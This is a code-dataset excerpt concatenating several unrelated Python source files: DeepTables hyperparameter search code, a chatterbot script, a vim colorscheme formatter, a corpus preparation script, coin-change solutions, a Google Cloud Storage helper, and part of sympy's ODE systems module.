dt_model.model.metrics_names\n\n user_metrics = dt_model.config.metrics\n if len(scores) != (len(user_metrics) + 1):\n raise ValueError(f\"Evaluate result has {len(scores)} items with loss score,\" +\n f\" not match with user specified metrics {user_metrics}; tf metrics names 
{tf_metrics_names}\")\n\n loss_name = tf_metrics_names[0]\n ret_metrics = [loss_name]\n ret_metrics.extend(dt_model.config.metrics)\n\n logger.info(f\"TF metrics names is {tf_metrics_names} and user's is {user_metrics}\")\n\n result = dict(zip(ret_metrics, scores))\n\n return result\n\n def predict_proba(self, X, **kwargs):\n result = self.model.predict_proba(X, **kwargs)\n return result\n\n def save(self, model_path):\n if not model_path.endswith(fs.sep):\n model_path = model_path + fs.sep\n\n self.model.save(model_path)\n\n stub = copy.copy(self)\n stub.model = None\n stub_path = model_path + 'dt_estimator.pkl'\n with fs.open(stub_path, 'wb') as f:\n pickle.dump(stub, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n @staticmethod\n def load(model_path):\n if not fs.exists(model_path):\n raise ValueError(f'Not found storage path: {model_path}')\n\n if not model_path.endswith(fs.sep):\n model_path = model_path + fs.sep\n\n stub_path = model_path + 'dt_estimator.pkl'\n if not fs.exists(stub_path):\n raise ValueError(f'Not found storage path of estimator: {stub_path}')\n\n with fs.open(stub_path, 'rb') as f:\n stub = pickle.load(f)\n\n model = DeepTable.load(model_path)\n stub.model = model\n\n return stub\n\n def get_iteration_scores(self):\n return []\n\n def __getstate__(self):\n try:\n state = super().__getstate__()\n except AttributeError:\n state = self.__dict__.copy()\n\n state['model'] = None\n\n return state\n\n\nclass HyperDT(HyperModel):\n def __init__(self, searcher, dispatcher=None, callbacks=[], reward_metric=None, discriminator=None,\n max_model_size=0, cache_preprocessed_data=False, **config_kwargs):\n self.config_kwargs = config_kwargs\n metrics = config_kwargs.get('metrics')\n if metrics is None and reward_metric is None:\n raise ValueError('Must specify `reward_metric` or `metrics`.')\n if reward_metric is None:\n reward_metric = metrics[0]\n if metrics is None:\n metrics = [reward_metric]\n config_kwargs['metrics'] = metrics\n if reward_metric not in metrics:\n metrics.append(reward_metric)\n config_kwargs['metrics'] = metrics\n self.cache_preprocessed_data = cache_preprocessed_data\n HyperModel.__init__(self, searcher, dispatcher=dispatcher, callbacks=callbacks, reward_metric=reward_metric)\n\n def load_estimator(self, model_file):\n assert model_file is not None\n return DTEstimator.load(model_file)\n\n def _get_estimator(self, space_sample):\n estimator = DTEstimator(space_sample, self.cache_preprocessed_data, **self.config_kwargs)\n return estimator\n\n def export_trial_configuration(self, trial):\n default_conf = ModelConfig()\n new_conf = trial.space_sample.DT_Module.config\n conf_set = []\n for f in default_conf._fields:\n if new_conf.__getattribute__(f) != default_conf.__getattribute__(f):\n conf_set.append(f'\\n\\t{f}={new_conf.__getattribute__(f)}')\n str = f'ModelConfig({\",\".join(conf_set)})\\n\\nfit params:{trial.space_sample.fit_params.param_values}'\n return str\n\n\ndef default_dt_space(**hyperparams):\n space = HyperSpace()\n with space.as_default():\n p_nets = MultipleChoice(\n ['dnn_nets', 'linear', 'cin_nets', 'fm_nets', 'afm_nets', 'pnn_nets',\n 'cross_nets', 'cross_dnn_nets', 'dcn_nets',\n 'autoint_nets', 'fgcnn_dnn_nets', 'fibi_dnn_nets'], num_chosen_most=3)\n dt_module = DTModuleSpace(\n nets=p_nets,\n auto_categorize=Bool(),\n cat_remain_numeric=Bool(),\n auto_discrete=Bool(),\n apply_gbm_features=Bool(),\n gbm_feature_type=Choice([DT_consts.GBM_FEATURE_TYPE_DENSE, DT_consts.GBM_FEATURE_TYPE_EMB]),\n embeddings_output_dim=Choice([4, 10, 20]),\n 
embedding_dropout=Choice([0, 0.1, 0.2, 0.3, 0.4, 0.5]),\n stacking_op=Choice([DT_consts.STACKING_OP_ADD, DT_consts.STACKING_OP_CONCAT]),\n output_use_bias=Bool(),\n apply_class_weight=Bool(),\n earlystopping_patience=Choice([1, 3, 5])\n )\n dnn = DnnModule()(dt_module)\n fit = DTFit(**hyperparams)(dt_module)\n\n return space\n\n\ndef mini_dt_space(**hyperparams):\n space = HyperSpace()\n with space.as_default():\n p_nets = MultipleChoice(\n ['dnn_nets', 'linear', 'fm_nets'], num_chosen_most=2)\n dt_module = DTModuleSpace(\n nets=p_nets,\n auto_categorize=Bool(),\n cat_remain_numeric=Bool(),\n auto_discrete=Bool(),\n apply_gbm_features=Bool(),\n gbm_feature_type=Choice([DT_consts.GBM_FEATURE_TYPE_DENSE, DT_consts.GBM_FEATURE_TYPE_EMB]),\n embeddings_output_dim=Choice([4, 10]),\n embedding_dropout=Choice([0, 0.5]),\n stacking_op=Choice([DT_consts.STACKING_OP_ADD, DT_consts.STACKING_OP_CONCAT]),\n output_use_bias=Bool(),\n apply_class_weight=Bool(),\n earlystopping_patience=Choice([1, 3, 5])\n )\n dnn = DnnModule(hidden_units=Choice([100, 200]),\n reduce_factor=Choice([1, 0.8]),\n dnn_dropout=Choice([0, 0.3]),\n use_bn=Bool(),\n dnn_layers=2,\n activation='relu')(dt_module)\n fit = DTFit(**hyperparams)(dt_module)\n\n return space\n\n\ndef mini_dt_space_validator(sample):\n nets = [p.value for p in sample.get_assigned_params() if p.alias.endswith('.nets')][0]\n return nets != ['fm_nets']\n\n\ndef tiny_dt_space(**hyperparams):\n space = HyperSpace()\n with space.as_default():\n dt_module = DTModuleSpace(\n nets=['dnn_nets'],\n auto_categorize=Bool(),\n cat_remain_numeric=Bool(),\n auto_discrete=False,\n apply_gbm_features=False,\n stacking_op=Choice([DT_consts.STACKING_OP_ADD, DT_consts.STACKING_OP_CONCAT]),\n output_use_bias=Bool(),\n apply_class_weight=Bool(),\n earlystopping_patience=Choice([1, 3, 5])\n )\n dnn = DnnModule(hidden_units=Choice([10, 20]),\n reduce_factor=1,\n dnn_dropout=Choice([0, 0.3]),\n use_bn=False,\n dnn_layers=2,\n activation='relu')(dt_module)\n hyperparams['batch_size'] = [64, 100]\n fit = DTFit(**hyperparams)(dt_module)\n\n return space\n\n # categorical_columns='auto',\n # exclude_columns=[],\n # pos_label=None,\n # metrics=['accuracy'],\n # auto_categorize=False,\n # cat_exponent=0.5,\n # cat_remain_numeric=True,\n # auto_encode_label=True,\n # auto_imputation=True,\n # auto_discrete=False,\n # apply_gbm_features=False,\n # gbm_params={},\n # gbm_feature_type=DT_consts.GBM_FEATURE_TYPE_EMB, # embedding/dense\n # fixed_embedding_dim=True,\n # embeddings_output_dim=4,\n # embeddings_initializer='uniform',\n # embeddings_regularizer=None,\n # embeddings_activity_regularizer=None,\n # dense_dropout=0,\n # embedding_dropout=0.3,\n # stacking_op=DT_consts.STACKING_OP_ADD,\n # output_use_bias=True,\n # apply_class_weight=False,\n # optimizer='auto',\n # loss='auto',\n # dnn_params={\n # 'hidden_units': ((128, 0, False), (64, 0, False)),\n # 'dnn_activation': 'relu',\n # },\n # autoint_params={\n # 'num_attention': 3,\n # 'num_heads': 1,\n # 'dropout_rate': 0,\n # 'use_residual': True,\n # },\n # fgcnn_params={'fg_filters': (14, 16),\n # 'fg_heights': (7, 7),\n # 'fg_pool_heights': (2, 2),\n # 'fg_new_feat_filters': (2, 2),\n # },\n # fibinet_params={\n # 'senet_pooling_op': 'mean',\n # 'senet_reduction_ratio': 3,\n # 'bilinear_type': 'field_interaction',\n # },\n # cross_params={\n # 'num_cross_layer': 4,\n # },\n # pnn_params={\n # 'outer_product_kernel_type': 'mat',\n # },\n # afm_params={\n # 'attention_factor': 4,\n # 'dropout_rate': 0\n # },\n # cin_params={\n # 
'cross_layer_size': (128, 128),\n # 'activation': 'relu',\n # 'use_residual': False,\n # 'use_bias': False,\n # 'direct': False,\n # 'reduce_D': False,\n # },\n # home_dir=None,\n # monitor_metric=None,\n # earlystopping_patience=1,\n # gpu_usage_strategy=DT_consts.GPU_USAGE_STRATEGY_GROWTH,\n # distribute_strategy=None,\n\n\ndef make_experiment(train_data,\n searcher=None,\n search_space=None,\n **kwargs):\n \"\"\"\n Utility to make CompeteExperiment instance with HyperDT.\n\n Parameters\n ----------\n\n Returns\n -------\n Runnable experiment object\n\n Notes:\n -------\n Initlialize Dask default client to enable dask in experiment.\n\n Examples:\n -------\n Create experiment with csv data file '/opt/data01/test.csv', and run it\n >>> experiment = make_experiment('/opt/data01/test.csv', target='y')\n >>> estimator = experiment.run()\n\n Create experiment with csv data file '/opt/data01/test.csv' with INFO logging, and run it\n >>> experiment = make_experiment('/opt/data01/test.csv', target='y', log_level='info')\n >>> estimator = experiment.run()\n\n Create experiment with parquet data files '/opt/data02/*.parquet', and run it with Dask\n >>> from dask.distributed import Client\n >>>\n >>> client = Client()\n >>> experiment = make_experiment('/opt/data02/*.parquet', target='y')\n >>> estimator = experiment.run()\n\n \"\"\"\n\n searcher_options = kwargs.pop('searcher_options', {})\n if (searcher is None or isinstance(searcher, str)) and search_space is None:\n search_space = mini_dt_space\n searcher_options['space_sample_validation_fn'] = mini_dt_space_validator\n\n default_settings = dict(verbose=0,\n # n_jobs=-1,\n )\n for k, v in default_settings.items():\n if k not in kwargs.keys():\n kwargs[k] = v\n if kwargs.get('cv', True) and 'n_jobs' not in kwargs.keys():\n kwargs['n_jobs'] = -1\n\n config_options = {}\n option_keys = set(f for f in ModelConfig._fields if f not in {'name', 'task', 'metrics', 'nets', 'pos_label'})\n for k in option_keys:\n if k in kwargs.keys():\n config_options[k] = kwargs.pop(k)\n if 'pos_label' in kwargs.keys():\n config_options['pos_label'] = kwargs.get('pos_label')\n\n if isnotebook() and 'callbacks' not in kwargs.keys():\n from hypernets.experiment import SimpleNotebookCallback\n from hypernets.core import NotebookCallback as SearchNotebookCallback\n\n kwargs['callbacks'] = [SimpleNotebookCallback()]\n kwargs['search_callbacks'] = [SearchNotebookCallback()]\n\n experiment = _make_experiment(HyperDT, train_data,\n searcher=searcher,\n searcher_options=searcher_options,\n search_space=search_space,\n hyper_model_options=config_options,\n **kwargs)\n return experiment\n\n\n_search_space_doc = \"\"\"\n default is mini_dt_space.\"\"\"\n\n\ndef _merge_doc():\n my_doc = DocLens(make_experiment.__doc__)\n params = DocLens(_make_experiment.__doc__).parameters\n params.pop('hyper_model_cls')\n params['search_space'] += _search_space_doc\n my_doc.parameters = params\n\n make_experiment.__doc__ = my_doc.render()\n\n\n_merge_doc()\n","repo_name":"DataCanvasIO/DeepTables","sub_path":"deeptables/models/hyper_dt.py","file_name":"hyper_dt.py","file_ext":"py","file_size_in_byte":18665,"program_lang":"python","lang":"en","doc_type":"code","stars":607,"dataset":"github-code","pt":"81"} +{"seq_id":"29112588968","text":"from chatterbot import ChatBot\r\nfrom chatterbot.trainers import ListTrainer\r\nimport os\r\n\r\nbot = ChatBot('Test')\r\ntrainer = ListTrainer(bot)\r\n\r\nfor files in os.listdir('D:/New folder (2)/'):\r\n conversation = open('D:/New folder (2)/' + files, 
'r').readlines()\r\n trainer.train(conversation)\r\n\r\nwhile True:\r\n request = input('You:').lower()\r\n response = bot.get_response(request)\r\n print('Botish:', response)\r\n","repo_name":"LaraIyswaryaRaneR/CHATBOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"86382582266","text":"from colortrans import rgb2short\nimport re\nimport sys\n\n\nHI_PATTERN = re.compile(\"hi\\s+(\\S*)\\s+(.*)\")\n\n\nif __name__ == \"__main__\":\n try:\n filename = sys.argv[1]\n with open(filename) as f:\n contents = f.read()\n\n def format_attributes(match):\n style_name, attr_string = match.groups()\n\n attrs = {}\n for attr in attr_string.split():\n name, value = attr.strip().split(\"=\")\n attrs[name] = value\n\n if \"guifg\" in attrs:\n value = attrs[\"guifg\"]\n attrs[\"ctermfg\"] = \"None\" if value == \"NONE\" else rgb2short(value)[0]\n if \"guibg\" in attrs:\n value = attrs[\"guibg\"]\n attrs[\"ctermbg\"] = \"None\" if value == \"NONE\" else rgb2short(value)[0]\n if \"gui\" in attrs:\n value = attrs[\"gui\"]\n attrs[\"cterm\"] = value[0] + value[1:].lower()\n\n format_attr = lambda name: \"{}={}\".format(name, attrs.get(name)) if name in attrs else \"\"\n\n attrs_formatted = \"{: <13} {: <13} {: <13} {: <13} {: <13} {: <13}\".format(\n format_attr(\"guifg\"),\n format_attr(\"guibg\"),\n format_attr(\"gui\"),\n format_attr(\"ctermfg\"),\n format_attr(\"ctermbg\"),\n format_attr(\"cterm\")).strip()\n\n return \"hi {: <15} {}\".format(style_name, attrs_formatted)\n\n formatted = HI_PATTERN.sub(format_attributes, contents)\n print(formatted)\n\n except IndexError:\n print(\"error: Expected a vim colorscheme file as first argument\")\n except KeyError:\n print(\"error: Invalid color value in source\")\n except:\n print(\"error: Something else went wrong\")\n","repo_name":"mistodon/dotfiles","sub_path":"bin/format_vim_colorscheme.py","file_name":"format_vim_colorscheme.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15302344340","text":"import pandas as pd\nimport json\nfrom gc import collect\nimport re\nfrom nltk.corpus import stopwords\n\n\ndef make_corps(jstrin):\n tokens = []\n for token in json.loads(jstrin):\n if token['lemma'] not in stopWords:\n lemma = re.sub(r'\\W', '', token['lemma'])\n if lemma:\n tokens.append(lemma.lower())\n return ' '.join(tokens)\n\n\nstopWords = set(stopwords.words())\n\ntrain = pd.read_csv('../data/train_parsed.csv')#, usecols=['content'])\n\ncorps = pd.DataFrame(index = train.index)\ncorps['content'] = train.content.apply(lambda x: make_corps(x))\n\ncorps.to_csv('../data/train_corps.csv')\ntrain.drop('content', axis=1,inplace=True)\ntrain.to_pickle('../data/train.pickle', compression='xz')\n\ndel train, corps\ncollect()\n\ntest = pd.read_csv('../data/test_parsed.csv')\ncorps = pd.DataFrame(index = test.index)\ncorps['content'] = test.content.apply(lambda x: make_corps(x))\ncorps.to_csv('../data/test_corps.csv')\ntest.drop('content', axis=1,inplace=True)\ntest.to_pickle('../data/test.pickle', compression='xz')\n\n","repo_name":"schokoro/how-good-is-your-medium-article","sub_path":"prepare_corpus.py","file_name":"prepare_corpus.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15381831060","text":"\"\"\"This module 
contains algorithms to solve the dynamic programming\nProblem - Min Coins to Make Change.\n\nThe problem statement can be found here - https://leetcode.com/problems/coin-change/\n\n\nRecurrence Relation\n---------------------\nf(c, A) = 0, if A == 0\nf(c, A) = 1 + min(f(c, A - c[i])), for all 'i' from 0 to c - 1 where c[i] <= A\n\n\n- In English, this says, that if you are given an amount of 0,\nthe minimum number of coins you need to use to make change is 0\n- For the recursive case, you need to try all possible combinations to make change\nwith each coin as long as that coin is less than or equal to the remaining amount\n- Take the minimum of all possible paths as your answer\n\"\"\"\n\n# Bottom Up Solution\n# time complexity: O(n * m), where 'n' is the total and 'm' is the length of coins\n# space comexplity: O(n)\n\n\ndef min_coins_to_make_change(coins, total):\n if not coins:\n return 0\n memo = [float(\"inf\")] * (total + 1)\n memo[0] = 0\n for amount in range(1, total + 1):\n for coin in coins:\n if coin <= amount:\n memo[amount] = min(memo[amount], 1 + memo[amount - coin])\n if memo[-1] == float(\"inf\"):\n return -1\n return memo[-1]\n\n\n# Top down solution with Recursion\n# time complexity: O(n * m), where 'n' is the amount and 'm' is the length of coins\n# space comexplity: O(n)\ndef coinChange(coins, amount):\n if not coins:\n return 0\n memo = [-1] * (amount + 1)\n min_coins = make_change(coins, amount, memo)\n if min_coins == float(\"inf\"):\n return -1\n return min_coins\n\n\ndef make_change(coins, remaining_amount, memo):\n if remaining_amount == 0:\n min_coins = 0\n elif memo[remaining_amount] >= 0:\n return memo[remaining_amount]\n else:\n min_coins = float(\"inf\")\n for coin in coins:\n if coin <= remaining_amount:\n result = make_change(coins, remaining_amount - coin, memo)\n min_coins = min(min_coins, result + 1)\n memo[remaining_amount] = min_coins\n return memo[remaining_amount]\n","repo_name":"EricMontague/Datastructures-and-Algorithms","sub_path":"dynammic_programming/min_coins_to_make_change.py","file_name":"min_coins_to_make_change.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23013928565","text":"import os\nimport asyncio\nfrom google.cloud import storage\nfrom google.oauth2 import service_account\nfrom app.config import settings\nimport base64\nclass ServiceBucket:\n key_path = \"app/key/service-account-file.json\"\n credentials = service_account.Credentials.from_service_account_file(key_path)\n storage_client = storage.Client(credentials=credentials)\n\n @staticmethod\n async def upload_blob_async(destination_blob_name, contents):\n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blob = bucket.blob(destination_blob_name)\n\n loop = asyncio.get_event_loop()\n await loop.run_in_executor(None, blob.upload_from_string, contents)\n return True\n except Exception as e:\n print(e)\n return False\n \n @staticmethod\n async def get_file_by_route(blob_name):\n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blob = bucket.blob(blob_name)\n\n loop = asyncio.get_event_loop()\n bytes_data = await loop.run_in_executor(None, blob.download_as_bytes)\n content_type = blob.content_type\n return {\n 'file_bytes': bytes_data,\n 'content_type': content_type,\n 'file_name': blob_name\n }\n except Exception as e:\n print(e)\n return {\n 'file_bytes': None,\n 'content_type': None,\n 'file_name': None\n }\n\n\n 
@staticmethod\n async def delete_file_by_route(blob_name):\n \n \n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blob = bucket.blob(blob_name)\n\n loop = asyncio.get_event_loop()\n await loop.run_in_executor(None, blob.delete)\n return True\n except Exception as e:\n print(e)\n return False\n @staticmethod\n async def download_blobs_in_folder(folder_path):\n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blobs = list(bucket.list_blobs(prefix=folder_path))\n files_data = []\n\n loop = asyncio.get_event_loop()\n\n for blob in blobs:\n bytes_data = await loop.run_in_executor(None, blob.download_as_bytes)\n base64_encoded_data = base64.b64encode(bytes_data).decode()\n files_data.append({\n 'file_base64': base64_encoded_data,\n 'content_type': blob.content_type,\n 'file_name': blob.name.split('/')[-1]\n })\n\n return files_data\n except Exception as e:\n print(e)\n return []\n\nservice_bucket = ServiceBucket()\n","repo_name":"DanielaMGX/server-cultural-events-management-system-","sub_path":"app/services/bucket.py","file_name":"bucket.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36218151503","text":"from sympy import (Derivative, Symbol)\nfrom sympy.core.numbers import I\nfrom sympy.core.relational import Eq\nfrom sympy.core.symbol import Dummy\nfrom sympy.functions import exp, im, cos, sin, re\nfrom sympy.functions.combinatorial.factorials import factorial\nfrom sympy.matrices import zeros, Matrix\nfrom sympy.simplify import simplify, collect\nfrom sympy.solvers.deutils import ode_order\nfrom sympy.solvers.solveset import NonlinearError\nfrom sympy.utilities import numbered_symbols, default_sort_key\nfrom sympy.utilities.iterables import ordered, uniq\n\n\ndef _get_func_order(eqs, funcs):\n return {func: max(ode_order(eq, func) for eq in eqs) for func in funcs}\n\n\nclass ODEOrderError(ValueError):\n \"\"\"Raised by linear_ode_to_matrix if the system has the wrong order\"\"\"\n pass\n\n\nclass ODENonlinearError(NonlinearError):\n \"\"\"Raised by linear_ode_to_matrix if the system is nonlinear\"\"\"\n pass\n\n\ndef linear_ode_to_matrix(eqs, funcs, t, order):\n r\"\"\"\n Convert a linear system of ODEs to matrix form\n\n Explanation\n ===========\n\n Express a system of linear ordinary differential equations as a single\n matrix differential equation [1]. For example the system $x' = x + y + 1$\n and $y' = x - y$ can be represented as\n\n .. math:: A_1 X' + A_0 X = b\n\n where $A_1$ and $A_0$ are $2 \\times 2$ matrices and $b$, $X$ and $X'$ are\n $2 \\times 1$ matrices with $X = [x, y]^T$.\n\n Higher-order systems are represented with additional matrices e.g. a\n second-order system would look like\n\n .. math:: A_2 X'' + A_1 X' + A_0 X = b\n\n Examples\n ========\n\n >>> from sympy import (Function, Symbol, Matrix, Eq)\n >>> from sympy.solvers.ode.systems import linear_ode_to_matrix\n >>> t = Symbol('t')\n >>> x = Function('x')\n >>> y = Function('y')\n\n We can create a system of linear ODEs like\n\n >>> eqs = [\n ... Eq(x(t).diff(t), x(t) + y(t) + 1),\n ... Eq(y(t).diff(t), x(t) - y(t)),\n ... 
]\n >>> funcs = [x(t), y(t)]\n >>> order = 1 # 1st order system\n\n Now ``linear_ode_to_matrix`` can represent this as a matrix\n differential equation.\n\n >>> (A1, A0), b = linear_ode_to_matrix(eqs, funcs, t, order)\n >>> A1\n Matrix([\n [1, 0],\n [0, 1]])\n >>> A0\n Matrix([\n [-1, -1],\n [-1, 1]])\n >>> b\n Matrix([\n [1],\n [0]])\n\n The original equations can be recovered from these matrices:\n\n >>> eqs_mat = Matrix([eq.lhs - eq.rhs for eq in eqs])\n >>> X = Matrix(funcs)\n >>> A1 * X.diff(t) + A0 * X - b == eqs_mat\n True\n\n If the system of equations has a maximum order greater than the\n order of the system specified, a ODEOrderError exception is raised.\n\n >>> eqs = [Eq(x(t).diff(t, 2), x(t).diff(t) + x(t)), Eq(y(t).diff(t), y(t) + x(t))]\n >>> linear_ode_to_matrix(eqs, funcs, t, 1)\n Traceback (most recent call last):\n ...\n ODEOrderError: Cannot represent system in 1-order form\n\n If the system of equations is nonlinear, then ODENonlinearError is\n raised.\n\n >>> eqs = [Eq(x(t).diff(t), x(t) + y(t)), Eq(y(t).diff(t), y(t)**2 + x(t))]\n >>> linear_ode_to_matrix(eqs, funcs, t, 1)\n Traceback (most recent call last):\n ...\n ODENonlinearError: The system of ODEs is nonlinear.\n\n Parameters\n ==========\n\n eqs : list of sympy expressions or equalities\n The equations as expressions (assumed equal to zero).\n funcs : list of applied functions\n The dependent variables of the system of ODEs.\n t : symbol\n The independent variable.\n order : int\n The order of the system of ODEs.\n\n Returns\n =======\n\n The tuple ``(As, b)`` where ``As`` is a tuple of matrices and ``b`` is the\n the matrix representing the rhs of the matrix equation.\n\n Raises\n ======\n\n ODEOrderError\n When the system of ODEs have an order greater than what was specified\n ODENonlinearError\n When the system of ODEs is nonlinear\n\n See Also\n ========\n\n linear_eq_to_matrix: for systems of linear algebraic equations.\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Matrix_differential_equation\n\n \"\"\"\n from sympy.solvers.solveset import linear_eq_to_matrix\n\n if any(ode_order(eq, func) > order for eq in eqs for func in funcs):\n msg = \"Cannot represent system in {}-order form\"\n raise ODEOrderError(msg.format(order))\n\n As = []\n\n for o in range(order, -1, -1):\n # Work from the highest derivative down\n funcs_deriv = [func.diff(t, o) for func in funcs]\n\n # linear_eq_to_matrix expects a proper symbol so substitute e.g.\n # Derivative(x(t), t) for a Dummy.\n rep = {func_deriv: Dummy() for func_deriv in funcs_deriv}\n eqs = [eq.subs(rep) for eq in eqs]\n syms = [rep[func_deriv] for func_deriv in funcs_deriv]\n\n # Ai is the matrix for X(t).diff(t, o)\n # eqs is minus the remainder of the equations.\n try:\n Ai, b = linear_eq_to_matrix(eqs, syms)\n except NonlinearError:\n raise ODENonlinearError(\"The system of ODEs is nonlinear.\")\n\n As.append(Ai)\n if o:\n eqs = [-eq for eq in b]\n else:\n rhs = b\n\n return As, rhs\n\n\ndef matrix_exp(A, t):\n r\"\"\"\n Matrix exponential $\\exp(A*t)$ for the matrix ``A`` and scalar ``t``.\n\n Explanation\n ===========\n\n This functions returns the $\\exp(A*t)$ by doing a simple\n matrix multiplication:\n\n .. math:: \\exp(A*t) = P * expJ * P^{-1}\n\n where $expJ$ is $\\exp(J*t)$. $J$ is the Jordan normal\n form of $A$ and $P$ is matrix such that:\n\n .. math:: A = P * J * P^{-1}\n\n The matrix exponential $\\exp(A*t)$ appears in the solution of linear\n differential equations. 
For example if $x$ is a vector and $A$ is a matrix\n then the initial value problem\n\n .. math:: \\frac{dx(t)}{dt} = A \\times x(t), x(0) = x0\n\n has the unique solution\n\n .. math:: x(t) = \\exp(A t) x0\n\n Examples\n ========\n\n >>> from sympy import Symbol, Matrix, pprint\n >>> from sympy.solvers.ode.systems import matrix_exp\n >>> t = Symbol('t')\n\n We will consider a 2x2 matrix for comupting the exponential\n\n >>> A = Matrix([[2, -5], [2, -4]])\n >>> pprint(A)\n [2 -5]\n [ ]\n [2 -4]\n\n Now, exp(A*t) is given as follows:\n\n >>> pprint(matrix_exp(A, t))\n [ -t -t -t ]\n [3*e *sin(t) + e *cos(t) -5*e *sin(t) ]\n [ ]\n [ -t -t -t ]\n [ 2*e *sin(t) - 3*e *sin(t) + e *cos(t)]\n\n Parameters\n ==========\n\n A : Matrix\n The matrix $A$ in the expression $\\exp(A*t)$\n t : Symbol\n The independent variable\n\n See Also\n ========\n\n matrix_exp_jordan_form: For exponential of Jordan normal form\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Jordan_normal_form\n .. [2] https://en.wikipedia.org/wiki/Matrix_exponential\n\n \"\"\"\n P, expJ = matrix_exp_jordan_form(A, t)\n return P * expJ * P.inv()\n\n\ndef matrix_exp_jordan_form(A, t):\n r\"\"\"\n Matrix exponential $\\exp(A*t)$ for the matrix *A* and scalar *t*.\n\n Explanation\n ===========\n\n Returns the Jordan form of the $\\exp(A*t)$ along with the matrix $P$ such that:\n\n .. math::\n \\exp(A*t) = P * expJ * P^{-1}\n\n Examples\n ========\n\n >>> from sympy import Matrix, Symbol\n >>> from sympy.solvers.ode.systems import matrix_exp, matrix_exp_jordan_form\n >>> t = Symbol('t')\n\n We will consider a 2x2 defective matrix. This shows that our method\n works even for defective matrices.\n\n >>> A = Matrix([[1, 1], [0, 1]])\n\n It can be observed that this function gives us the Jordan normal form\n and the required invertible matrix P.\n\n >>> P, expJ = matrix_exp_jordan_form(A, t)\n\n Here, it is shown that P and expJ returned by this function is correct\n as they satisfy the formula: P * expJ * P_inverse = exp(A*t).\n\n >>> P * expJ * P.inv() == matrix_exp(A, t)\n True\n\n Parameters\n ==========\n\n A : Matrix\n The matrix $A$ in the expression $\\exp(A*t)$\n t : Symbol\n The independent variable\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Defective_matrix\n .. [2] https://en.wikipedia.org/wiki/Jordan_matrix\n .. 
[3] https://en.wikipedia.org/wiki/Jordan_normal_form\n\n \"\"\"\n\n N, M = A.shape\n if N != M:\n raise ValueError('Needed square matrix but got shape (%s, %s)' % (N, M))\n elif A.has(t):\n raise ValueError('Matrix A should not depend on t')\n\n def jordan_chains(A):\n '''Chains from Jordan normal form analogous to M.eigenvects().\n Returns a dict with eignevalues as keys like:\n {e1: [[v111,v112,...], [v121, v122,...]], e2:...}\n where vijk is the kth vector in the jth chain for eigenvalue i.\n '''\n P, blocks = A.jordan_cells()\n basis = [P[:,i] for i in range(P.shape[1])]\n n = 0\n chains = {}\n for b in blocks:\n eigval = b[0, 0]\n size = b.shape[0]\n if eigval not in chains:\n chains[eigval] = []\n chains[eigval].append(basis[n:n+size])\n n += size\n return chains\n\n eigenchains = jordan_chains(A)\n\n # Needed for consistency across Python versions:\n eigenchains_iter = sorted(eigenchains.items(), key=default_sort_key)\n isreal = not A.has(I)\n\n blocks = []\n vectors = []\n seen_conjugate = set()\n for e, chains in eigenchains_iter:\n for chain in chains:\n n = len(chain)\n if isreal and e != e.conjugate() and e.conjugate() in eigenchains:\n if e in seen_conjugate:\n continue\n seen_conjugate.add(e.conjugate())\n exprt = exp(re(e) * t)\n imrt = im(e) * t\n imblock = Matrix([[cos(imrt), sin(imrt)],\n [-sin(imrt), cos(imrt)]])\n expJblock2 = Matrix(n, n, lambda i,j:\n imblock * t**(j-i) / factorial(j-i) if j >= i\n else zeros(2, 2))\n expJblock = Matrix(2*n, 2*n, lambda i,j: expJblock2[i//2,j//2][i%2,j%2])\n\n blocks.append(exprt * expJblock)\n for i in range(n):\n vectors.append(re(chain[i]))\n vectors.append(im(chain[i]))\n else:\n vectors.extend(chain)\n fun = lambda i,j: t**(j-i)/factorial(j-i) if j >= i else 0\n expJblock = Matrix(n, n, fun)\n blocks.append(exp(e * t) * expJblock)\n\n expJ = Matrix.diag(*blocks)\n P = Matrix(N, N, lambda i,j: vectors[j][i])\n\n return P, expJ\n\n\ndef _neq_linear_first_order_const_coeff_homogeneous(match_):\n r\"\"\"\n System of n first-order constant-coefficient linear homogeneous differential equations\n\n .. math:: y'_k = a_{k1} y_1 + a_{k2} y_2 +...+ a_{kn} y_n; k = 1,2,...,n\n\n or that can be written as `\\vec{y'} = A . \\vec{y}`\n where `\\vec{y}` is matrix of `y_k` for `k = 1,2,...n` and `A` is a `n \\times n` matrix.\n\n Since these equations are equivalent to a first order homogeneous linear\n differential equation. So the general solution will contain `n` linearly\n independent parts and solution will consist some type of exponential\n functions. Assuming `y = \\vec{v} e^{rt}` is a solution of the system where\n `\\vec{v}` is a vector of coefficients of `y_1,...,y_n`. Substituting `y` and\n `y' = r v e^{r t}` into the equation `\\vec{y'} = A . \\vec{y}`, we get\n\n .. math:: r \\vec{v} e^{rt} = A \\vec{v} e^{rt}\n\n .. math:: r \\vec{v} = A \\vec{v}\n\n where `r` comes out to be eigenvalue of `A` and vector `\\vec{v}` is the eigenvector\n of `A` corresponding to `r`. There are three possibilities of eigenvalues of `A`\n\n - `n` distinct real eigenvalues\n - complex conjugate eigenvalues\n - eigenvalues with multiplicity `k`\n\n 1. When all eigenvalues `r_1,..,r_n` are distinct with `n` different eigenvectors\n `v_1,...v_n` then the solution is given by\n\n .. math:: \\vec{y} = C_1 e^{r_1 t} \\vec{v_1} + C_2 e^{r_2 t} \\vec{v_2} +...+ 